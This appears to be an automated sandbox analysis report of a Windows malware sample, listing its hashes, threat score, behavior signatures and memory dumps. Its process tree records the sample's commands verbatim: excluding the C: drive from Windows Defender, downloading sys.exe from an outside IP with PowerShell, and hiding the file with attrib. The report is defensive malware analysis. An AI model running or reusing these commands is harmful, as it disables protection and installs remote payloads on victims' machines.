Overview

overview

10

Static

static

1

7a546b2322...81.exe

windows7-x64

8

7a546b2322...81.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    13s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    18-11-2024 21:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7a546b23227b6b2c2f70325b1c5e9207394b42c74e88a8f977edbb60e2c3a881.exe

  • Size

    41KB

  • MD5

    a3c10831383854f41845e80b3926d60a

  • SHA1

    05526d00bc628eb34fa153ad8bf23391c7b1d272

  • SHA256

    7a546b23227b6b2c2f70325b1c5e9207394b42c74e88a8f977edbb60e2c3a881

  • SHA512

    11e05f665ef6e9e855e83d36fd708a6dc7a2b6a6926a1d1fd0e96bbddf67b1c9427c8f899b8a60b6bc7157d37707f6632a65f8198597a388ff150f0033c0860e

  • SSDEEP

    768:I6F3VHDlvYnuU9c7q6e3tr53BFo2rAbvZ2Eore:TnlwDc7c5F8h2i

Score
8/10
defense_evasionexecution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
    defense_evasion
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\7a546b23227b6b2c2f70325b1c5e9207394b42c74e88a8f977edbb60e2c3a881.exe
    "C:\Users\Admin\AppData\Local\Temp\7a546b23227b6b2c2f70325b1c5e9207394b42c74e88a8f977edbb60e2c3a881.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1084
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\\'"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\\'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2472
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest 'http://45.95.214.119/sys.exe' -OutFile 'C:\Users\Admin\AppData\Local\System\sys.exe'"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest 'http://45.95.214.119/sys.exe' -OutFile 'C:\Users\Admin\AppData\Local\System\sys.exe'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2936
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h "C:\Users\Admin\AppData\Local\System\sys.exe" /s /d
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:3064
      • C:\Windows\system32\attrib.exe
        attrib +h "C:\Users\Admin\AppData\Local\System\sys.exe" /s /d
        3⤵
        • Views/modifies file attributes
        PID:3032

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    469752bfb085c1fe2715454b475a510c

    SHA1

    0f6ad149d72b50e02566c54757c5edde5796eb2c

    SHA256

    0d8e7bc7831ee5757df2ca3460a279d916ff6a2e19b8e6b93e5a19ad976ef131

    SHA512

    7e7aae63059ae95d502fe5f492b33289cf20c22b582836177b1a86442ba4369e945a3918f7df44788a73960a79ac8af47211c21b67cba103130bbae068fa2e0d

    Download Submit

  • memory/2472-5-0x000007FEF4ACE000-0x000007FEF4ACF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2472-6-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2472-7-0x0000000002430000-0x0000000002438000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2472-8-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2472-9-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2472-10-0x000000000297B000-0x00000000029E2000-memory.dmp

    Filesize

    412KB

    Download

  • memory/2472-12-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2472-11-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2936-18-0x000000001B2A0000-0x000000001B582000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2936-19-0x0000000002650000-0x0000000002658000-memory.dmp

    Filesize

    32KB

    Download